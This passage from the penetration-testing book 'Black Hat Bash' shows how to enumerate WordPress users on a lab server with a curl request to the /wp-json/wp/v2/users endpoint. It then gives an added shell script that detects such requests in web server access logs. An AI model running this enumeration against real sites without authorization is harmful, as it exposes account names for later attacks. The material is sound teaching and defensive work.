Figure 5-2: The WordPress login page
Lastly, verify the third finding: the WordPress user-enumeration
vulnerability, which allows you to gather information about
WordPress accounts. By default, every WordPress instance exposes
an API endpoint that lists WordPress system users at
/wp-json/wp/v2/users. This endpoint usually doesn’t require
authentication or authorization, so a simple GET request should
return the list of users.
We’ll use cURL to send this request and pipe the response to jq
to prettify the JSON output that comes back. The result should be an
array of user data:
$ curl -s http://172.16.10.12/wp-json/wp/v2/users/ | jq
[
  {
    "id": 1,
    "name": "jtorres",
    "url": "http://172.16.10.12",
    "description": "",
    "link": "http://172.16.10.12/author/jtorres/",
    "slug": "jtorres",
  },
  --snip--
]
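On a server you operate, the same request leaves a trace in the web server's access log, so you can check which clients were served this user list. The script below is an added example, not code from the book; it assumes the Apache/Nginx combined log format, and the function names and sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: report clients that got an HTTP 200 from the
# WordPress REST users endpoint (/wp-json/wp/v2/users).
# Assumption: access logs use the combined log format.

# Constructed sample log lines (documentation IP ranges, not real data).
sample_log() {
cat <<'EOF'
203.0.113.7 - - [10/Mar/2023:10:01:02 +0000] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 512 "-" "curl/7.88.1"
203.0.113.7 - - [10/Mar/2023:10:01:05 +0000] "GET /wp-json/wp/v2/users?page=2 HTTP/1.1" 200 2048 "-" "curl/7.88.1"
198.51.100.4 - - [10/Mar/2023:10:02:00 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2023:10:03:00 +0000] "GET /wp-json/wp/v2/users/ HTTP/1.1" 401 90 "-" "Mozilla/5.0"
192.0.2.15 - - [10/Mar/2023:10:04:00 +0000] "GET /wp-json/wp/v2/users/1 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
EOF
}

# Reads access log lines on stdin and prints "<hits> <client-ip>",
# busiest client first. Only GET requests answered with 200 count,
# because those are the ones that actually returned user data.
find_user_enum() {
    awk '
    {
        # Combined format: $1 client, $6 "\"METHOD", $7 path, $9 status.
        method = $6; sub(/^"/, "", method)
        path = $7; status = $9
        sub(/\?.*/, "", path)    # ignore any query string
        # Match the collection (/users, /users/) and single users (/users/1).
        if (method == "GET" && status == 200 &&
            path ~ /^\/wp-json\/wp\/v2\/users(\/[0-9]*)?$/)
            hits[$1]++
    }
    END { for (ip in hits) print hits[ip], ip }
    ' | sort -k1,1nr -k2,2
}

# Demo run over the constructed sample.
sample_log | find_user_enum
```

A request answered with 401 or 403, like the one from 198.51.100.9 in the sample, shows the endpoint refusing anonymous access and is deliberately left out of the report.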
Black Hat Bash (Early Access) © 2023 by Dolev Farhi and Nick Aleks